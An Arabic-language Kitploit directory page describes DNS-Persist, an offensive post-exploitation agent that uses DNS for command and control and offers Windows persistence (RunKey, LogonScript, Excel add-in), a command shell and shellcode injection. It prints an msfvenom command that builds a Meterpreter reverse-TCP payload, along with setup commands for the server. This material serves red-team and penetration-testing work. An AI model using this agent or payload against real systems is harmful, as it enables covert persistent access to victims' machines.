Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DNS-Persist — DNS-Persist هو وكيل ما بعد الاستغلال يستخدم DNS للقيادة والتحكم. | Kitploit
أدوات/GitHubGitHub/0x09al/dns-persist
توليد الحمولةآليات الاستمراريةشيل كودما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتحليل DNS
GitHub0x09al/dns-persist

DNS-Persist

DNS-Persist هو وكيل ما بعد الاستغلال يستخدم DNS للقيادة والتحكم.

عرض المستودع
20763منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DNS-Persist

DNS-Persist هي أداة استغلال لاحق (post-exploitation agent) تستخدم DNS للقيادة والتحكم. الكود في جانب الخادم مكتوب بلغة Python بينما العميل (agent) مبرمج بلغة C++. هذه هي النسخة الأولى، وسيتم إضافة المزيد من الميزات والتحسينات في المستقبل.

البدء

المؤلف

0x09AL - https://twitter.com/0x09al

إخلاء مسؤولية

لا تستخدم هذا البرنامج لأغراض غير قانونية.

المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام للكود المقدم هنا.

هل أعدت اختراع العجلة؟

هناك الكثير من الأعمال الرائعة حول DNS C2، لكنني أنشأت هذا البرنامج ليكون أكثر تركيزًا على جزء الثباتية (persistence). لست خبيرًا في C++ وهذا أول "برنامج حقيقي" لي بهذه اللغة (فتوقع بعض الأكواد المسببة للحرج).

الاقتراحات حول الميزات والتحسينات مفتوحة.

البنية

هناك جزءان رئيسيان:

  1. خادم DNS
  2. العميل (Agent)

alt text

الميزات

آليات الثباتية

تحتوي هذه النسخة على 3 آليات فقط للثباتية. سيتم إضافة المزيد لاحقًا.

  1. ثباتية LogonScript.
  2. ثباتية RunKey.
  3. ثباتية Excel Addin.

غلاف أوامر 'تفاعلي'

تدعم هذه النسخة غلاف أوامر شبه تفاعلي (pseudo-interactive) يمكنك استخدامه لتنفيذ أوامر النظام.

حقن الشيلكود

تدعم هذه النسخة حقن شيلكود (shellcode) 32-بت. يتم تنفيذ الشيلكود في سلسلة (thread) جديدة داخل نفس العملية، لذلك أي انهيار في الشيلكود أو شيلكود غير صالح سيتسبب أيضًا في انهيار العميل. تجنب وجود بايتات NULL في الشيلكود.

مثال على توليد الشيلكود

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port EXITFUNC=thread -b "\x00" -f hex -o /tmp/shellcode.hex

قائمة المهام

  1. إضافة التشفير. لا تحتوي هذه النسخة على أي تشفير، لذا تحمل المخاطر بنفسك عند استخدامها.
  2. إضافة المزيد من آليات الثباتية.
  3. عميل بلغات برمجة مختلفة.

التثبيت والاستخدام

جانب الخادم

root@kitploit:~
pip install dnslib
git clone https://github.com/0x09AL/DNS-Persist
python server.py

سيتم تشغيل خادم DNS على المنفذ 53 افتراضيًا. يمكنك تغيير ذلك في ملف server.py.

العميل

استخدمت Visual Studio 2010 لكتابة كود العميل، لذا فإن استيراده وتجميعه يجب أن يكون سهلًا إلى حد ما.

تذكر تغيير المتغير DOMAIN_NAME في ملف Declarations.h ليطابق اسم النطاق الخاص بك.

يجب أن تشير خوادم أسماء النطاق إلى عنوان IP الخاص بـ DNS-Persist.

root@kitploit:~
#define DOMAIN_NAME "example.com"

لقطات الشاشة

  1. صورة-1

alt text

  1. صورة-2

alt text

  1. صورة-3

alt text

  1. صورة-4

alt text

تنزيل الأداة